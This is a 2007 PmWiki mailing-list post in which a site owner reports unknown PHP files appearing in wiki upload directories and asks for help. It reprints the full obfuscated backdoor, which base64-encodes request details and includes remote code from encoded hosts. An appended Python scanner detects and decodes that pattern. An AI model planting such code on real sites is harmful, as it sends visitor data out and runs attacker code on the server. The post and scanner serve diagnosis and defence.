[pmwiki-users] Mysterious php file appears in upload directory

Dr Fred C drfredc at verizon.net
Sat Apr 28 11:34:32 CDT 2007


I went to upload a file to one of my wikis this morning and, while that 
went fine, I noticed a curious 43248.php file that had been uploaded to 
this upload directory, last night around 2:30 am. I checked with my 
FTP program and quite a number of my various wikis had a similar php 
file in the uploads directories, and in the wiki.d directory -- always 
with a different # for the file name, always of the same size.

I downloaded it and it contained this info.

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? 
$_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? 
$_SERVER["SERVER_NAME"] : 
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? 
$_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) 
? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) 
? $_SERVER["QUERY_STRING"] : 
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? 
$_SERVER["HTTP_REFERER"] : 
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? 
$_SERVER["HTTP_USER_AGENT"] : 
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? 
$_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? 
$_SERVER["SCRIPT_FILENAME"] : 
$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? 
$_SERVER["HTTP_ACCEPT_LANGUAGE"] : 
$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); 
if 
((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} 
else 
{include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} 
?>

--------
Any ideas on what is going on here?  

-- 

Always, Dr Fred C
drfredc at drfredc.com
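
Added example (not part of the original post, and not PmWiki code): the posted file base64-encodes the request details and include()s a URL assembled from base64_decode() literals, so a scanner can flag that construct and decode the literals to show where the include points. The function names and the temporary directory tree are assumptions made for this example; the two include statements in SAMPLE are copied from the post.

```python
import base64
import os
import re
import tempfile

# One base64_decode("...") literal, and a run of them joined with PHP's "." operator
LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
CHAIN = re.compile(r'(?:' + LITERAL.pattern + r'\s*\.?\s*)+')
# include/require whose argument starts with base64_decode(), as in the posted file
OBFUSCATED_INCLUDE = re.compile(r'\b(?:include|require)(?:_once)?\b[\s(]*base64_decode\s*\(', re.I)

# Constructed sample: the two include statements are copied from the post, the rest is cut
SAMPLE = '''<? error_reporting(0); $str = "x";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);}
?>'''

def decoded_chains(php_source):
    """Decode each run of concatenated base64_decode() literals into one string."""
    results = []
    for chain in CHAIN.finditer(php_source):
        try:
            parts = [base64.b64decode(b, validate=True) for b in LITERAL.findall(chain.group(0))]
        except ValueError:  # binascii.Error: not real base64, skip this run
            continue
        results.append(b"".join(parts).decode("utf-8", "replace"))
    return results

def scan(root):
    """Return (path, decoded strings) for PHP files under root that include a base64-built target."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not re.search(r'\.(?:php\d?|phtml)$', name, re.I):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if OBFUSCATED_INCLUDE.search(src):
                hits.append((path, decoded_chains(src)))
    return hits

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:  # constructed tree, not a real wiki
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "uploads", "43248.php"), "w") as fh:
            fh.write(SAMPLE)
        for path, targets in scan(root):
            print(path, "->", targets)
```

Pointing scan() at a wiki's uploads and wiki.d directories lists each matching file with its decoded include targets; any .php file in those data directories deserves a look even when this pattern does not match.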



